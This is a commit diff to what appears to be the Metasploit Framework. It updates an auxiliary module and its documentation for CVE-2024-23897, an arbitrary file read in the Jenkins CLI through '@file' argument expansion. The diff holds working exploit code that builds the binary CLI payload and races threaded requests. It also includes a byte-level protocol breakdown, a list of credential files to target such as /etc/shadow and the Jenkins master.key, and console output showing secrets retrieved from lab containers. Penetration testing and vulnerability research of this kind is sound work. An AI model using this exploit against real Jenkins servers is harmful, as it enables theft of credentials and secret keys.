updates to jenkins ccli ampersand file read

h00die · h00die · commit 064a2f34683f · 2024-01-30T17:12:10.000-05:00
diff --git a/documentation/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.md b/documentation/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.md
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+Exploitation by hand can be done by downloading the CLI from the target: `wget http://<host>:8080/jnlpJars/jenkins-cli.jar`
+
+Vulnerable versions include:
+
+ * < 2.442
+ * LTS < 2.426.3
+
+### Protocol Breakdown
+
+A few samples of the protocol that was observed, how to generate it, and the breakdown of fields.
+ 
+|                                           | **Generator**                                                                    | **Heading**                  | **Pad (1)**      | **Unknown (len(@file_name) + 2)** | **len(@file_name)** | **@** | **file_name**            | **Unknown**  | **len(encoding)** | **UTF-8**  | **Unknown**  | **len(locality)** | **en_US**  | **footer** |
+|-------------------------------------------|----------------------------------------------------------------------------------|------------------------------|------------------|-------------|---------------------|-------|--------------------------|--------------|-------------------|------------|--------------|-------------------|------------|------------|
+| **no pad multi line file (/tmp/file.22)** | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help "@/tmp/test.22"   | 0000000600000468656c70000000 |                  | 0f0000      | 0d                  | 40    | 2f746d702f746573742e3232 | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **no pad single line file (/tmp/file.1)** | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help "@/tmp/test.1"    | 0000000600000468656c70000000 |                  | 0e0000      | 0c                  | 40    | 2f746d702f746573742e31   | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **pad multi line file (/tmp/file.22)**    | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/tmp/test.22" | 0000000600000468656c70000000 | 0300000131000000 | 0f0000      | 0d                  | 40    | 2f746d702f746573742e3232 | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **pad single line file (/tmp/file.1)**    | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/tmp/test.1"  | 0000000600000468656c70000000 | 0300000131000000 | 0e0000      | 0c                  | 40    | 2f746d702f746573742e31   | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+
+### Docker Setup
+
+Version 2.440: `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.440-jdk17`
+
+LTS Version 2.426.2: `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.426.2-lts`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read`
+1. Do: `set rhost [ip]`
+1. Do: `run`
+1. You should get the first two lines of the `FILE_PATH`
+
+## Options
+
+### FILE_PATH
+
+File path to read from the server. Defaults to `/etc/passwd`.
+
+Other files which may be of value:
+ * `/var/jenkins_home/secret.key`
+ * `/var/jenkins_home/secrets/master.key`
+ * `/var/jenkins_home/secrets/initialAdminPassword`
+ * `/etc/passwd`
+ * `/etc/shadow`
+ * Project secrets and credentials
+ * Source code, build artifacts
+
+### DELAY
+
+Delay between first and second request to ensure first request gets there on time, but the second request is very quickly behind it.
+Defaults to `0.5`
+
+Testing against the docker image showed values between `.01` and `1.9` were successful.
+
+### ENCODING
+
+Encoding to use for reading the file. This may mangle binary files. Defaults to `UTF-8`
+
+### LOCALITY
+
+Locality to use for reading the file. This may mangle binary files. Defaults to `en_US`
+
+## Scenarios
+
+### jenkins 2.440-jdk17 on Docker
+
+```
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secrets/initialAdminPassword
+file_path => /var/jenkins_home/secrets/initialAdminPassword
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+
+[*] Sending requests with UUID: ed148f4d-709a-4d16-a452-4509f3a37ed6
+[*] Re-attempting with padding for single line output file
+[+] /var/jenkins_home/secrets/initialAdminPassword file contents retrieved (first line or 2):
+f5d5f6e98e1f466aad22c0f81ca48fb0
+[+] Results saved to: /root/.msf4/loot/20240130204021_default_127.0.0.1_jenkins.file_717110.txt
+[*] Auxiliary module execution completed
+```
+
+### jenkins 2.426.2-lts on Docker
+
+```
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secret.key
+file_path => /var/jenkins_home/secret.key
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+
+[*] Sending requests with UUID: 0d69c3f1-7695-4db1-a0c6-08108f33e339
+[*] Re-attempting with padding for single line output file
+[+] /var/jenkins_home/secret.key file contents retrieved (first line or 2):
+6ce26592ad3683cc8d056bea07ffa2696f1b14f0db64dbd122c50ab930e279ad
+[+] Results saved to: /root/.msf4/loot/20240130204241_default_127.0.0.1_jenkins.file_317409.txt
+[*] Auxiliary module execution completed
+```
diff --git a/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb b/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
@@ -11,9 +11,39 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Jenkins cliConnect Arbitrary File Read',
+        'Name' => 'Jenkins cli Ampersand Replacement Arbitrary File Read',
         'Description' => %q{
-          docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.440-jdk17
+          This module utilizes the Jenkins cli protocol to run the `help` command.
+          The cli is accessible with read-only permissions by default, which are
+          all thats required.
+
+          Jenkins cli utilizes `args4j's` `parseArgument`, which calls `expandAtFiles` to
+          replace any `@<filename>` with the contents of a file. We are then able to retrieve
+          the error message to read up to the first two lines of a file.
+
+          Exploitation by hand can be done with the cli, see markdown documents for additional
+          instructions.
+
+          There are a few exploitation oddities:
+          1. The injection point for the `help` command requires 2 input arguments.
+          When the `expandAtFiles` is called, each line of the `FILE_PATH` becomes an input argument.
+          If a file only contains one line, it will throw an error: `ERROR: You must authenticate to access this Jenkins.`
+          However, we can pad out the content by supplying a first argument.
+          2. There is a strange timing requirement where the `download` (or first) request must get
+          to the server first, but the `upload` (or second) request must be very close behind it.
+          From testing against the docker image, it was found values between `.01` and `1.9` were
+          viable. Due to the round trip time of the first request and response happening before
+          request 2 would be received, it is necessary to use threading to ensure the requests
+          happen within rapid succession.
+
+          Files of value:
+          * /var/jenkins_home/secret.key
+          * /var/jenkins_home/secrets/master.key
+          * /var/jenkins_home/secrets/initialAdminPassword
+          * /etc/passwd
+          * /etc/shadow
+          * Project secrets and credentials
+          * Source code, build artifacts
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -39,10 +69,11 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ ],
-          'SideEffects' => [ IOC_IN_LOGS ]
+          'SideEffects' => [ ]
         },
         'DefaultOptions' => {
-          'RPORT' => 8080
+          'RPORT' => 8080,
+          'HttpClientTimeout' => 3 # very quick response, so set this low
         }
       )
     )
@@ -54,12 +85,14 @@ def initialize(info = {})
     )
     register_advanced_options(
       [
-        OptFloat.new('DELAY', [true, 'Delay between first and second request', 0.01]),
+        OptFloat.new('DELAY', [true, 'Delay between first and second request', 0.5]),
+        OptString.new('ENCODING', [true, 'Encoding to use for reading the file', 'UTF-8']),
+        OptString.new('LOCALITY', [true, 'Locality to use for reading the file', 'en_US'])
       ]
     )
   end
 
-  # Returns the Jenkins version. taken from jenkins_cred_recovery.rb
+  # Returns the Jenkins version. taken from jenkins_cred_recovery.rb, upgraded to work with newer versions
   #
   # @return [String] Jenkins version.
   # @return [NilClass] No Jenkins version found.
@@ -71,29 +104,65 @@ def get_jenkins_version
       fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
     end
 
+    # shortcut for new versions such as 2.426.2 and 2.440
+    return res.headers['X-Jenkins'] if res.headers['X-Jenkins']
+
     html = res.get_html_document
     version_attribute = html.at('body').attributes['data-version']
     version = version_attribute ? version_attribute.value : ''
     version.scan(/jenkins-([\d.]+)/).flatten.first
   end
 
-  # Returns a check code indicating the vulnerable status. taken from jenkins_cred_recovery.rb
-  #
-  # @return [Array] Check code
   def check
     version = get_jenkins_version
-    vprint_status("Found version: #{version}")
 
-    # Default version is vulnerable, but can be mitigated by refusing anonymous permission on
-    # decryption API. So a version wouldn't be adequate to check.
-    if version
-      return Exploit::CheckCode::Detected
+    return Exploit::CheckCode::Safe('Unable to determine Jenkins version number') if version.nil? || version.blank?
+
+    version = Rex::Version.new(version)
+
+    if version <= Rex::Version.new('2.426.2') || # LTS check
+       (version >= Rex::Version.new('2.427') && version <= Rex::Version.new('2.441')) # non-lts
+      return Exploit::CheckCode::Appears("Found exploitable version: #{version}")
     end
 
-    Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe("Found non-exploitable version: #{version}")
+  end
+
+  def request_header
+    "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00"
+  end
+
+  def request_footer
+    data = []
+    data << "\x00\x00\x00\x07\x02\x00"
+    data << [datastore['ENCODING'].length].pack('C') # length of encoding string
+    data << datastore['ENCODING']
+    data << "\x00\x00\x00\x07\x01\x00"
+    data << [datastore['LOCALITY'].length].pack('C') # length of locality string
+    data << datastore['LOCALITY']
+    data << "\x00\x00\x00\x00\x03"
+    data
   end
 
-  def upload_request(uuid)
+  def parameter_one
+    # a literal parameter of 1
+    "\x03\x00\x00\x01\x31\x00\x00\x00"
+  end
+
+  def data_generator(pad = false)
+    data = []
+    data << request_header
+    data << parameter_one if pad == true
+    data << [datastore['FILE_PATH'].length + 3].pack('C').to_s
+    data << "\x00\x00"
+    data << [datastore['FILE_PATH'].length + 1].pack('C').to_s
+    data << "\x40"
+    data << datastore['FILE_PATH']
+    data << request_footer
+    data.join('')
+  end
+
+  def upload_request(uuid, multi_line_file = true)
     # send upload request asking for file
 
     # In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request
@@ -111,16 +180,15 @@ def upload_request(uuid)
       'vars_get' => {
         'remoting' => 'false'
       },
-      # https://github.com/h4x0r-dz/CVE-2024-23897/blob/main/CVE-2024-23897.py#L45C13-L45C187
-      'data' => "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@#{datastore['FILE_PATH']}\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"
+      'data' => data_generator(multi_line_file)
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to upload request (response code: #{res.code})") unless res.code == 200
     # we don't get a response here, so we just need the request to go through and 200 us
   end
 
-  def process_result
+  def process_result(use_pad)
     # the output comes back as follows:
 
     # ERROR: Too many arguments: <line 2>
@@ -131,7 +199,8 @@ def process_result
 
     # The main thing here is we get the first 2 lines of output from the file.
     # The 2nd line from the file is returned on line 1 of the output, and line
-    # 1 from the file is returned on the last line of output.
+    # 1 from the file is returned on the last line of output. If padding was used
+    # then <line 1> will just be a literal 1
 
     file_contents = []
     @content_body.split("\n").each do |html_response_line|
@@ -146,7 +215,12 @@ def process_result
     end
     return if file_contents.empty?
 
-    print_good("#{datastore['FILE_PATH']} file contents:\n#{file_contents.join("\n")}")
+    # if we padded out, then our first line is 1, so drop that
+    file_contents = file_contents.drop(1) if use_pad == true
+
+    print_good("#{datastore['FILE_PATH']} file contents retrieved (first line or 2):\n#{file_contents.join("\n")}")
+    stored_path = store_loot('jenkins.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
+    print_good("Results saved to: #{stored_path}")
   end
 
   def download_request(uuid)
@@ -183,9 +257,10 @@ def run
     # the server resulted in a 500 error. So we need to thread these to
     # execute them fast enough that the server gets both in rapid succession
 
+    use_pad = false
     threads = []
     threads << framework.threads.spawn('CVE-2024-23897', false) do
-      upload_request(uuid)
+      upload_request(uuid, use_pad) # try single line file first since we get an error if we have more content to get
     end
     threads << framework.threads.spawn('CVE-2024-23897', false) do
       download_request(uuid)
@@ -197,8 +272,27 @@ def run
       nil
     end
 
+    # we got an error that means we need to pad out our value, so rerun with pad
+    if @content_body && @content_body.include?('ERROR: You must authenticate to access this Jenkins.')
+      print_status('Re-attempting with padding for single line output file')
+      use_pad = true
+      threads = []
+      threads << framework.threads.spawn('CVE-2024-23897', false) do
+        upload_request(uuid, use_pad)
+      end
+      threads << framework.threads.spawn('CVE-2024-23897', false) do
+        download_request(uuid)
+      end
+
+      threads.map do |t|
+        t.join
+      rescue StandardError
+        nil
+      end
+    end
+
     if @content_body
-      process_result
+      process_result(use_pad)
     else
       print_bad('Exploit failed, no exploit data was successfully returned')
     end
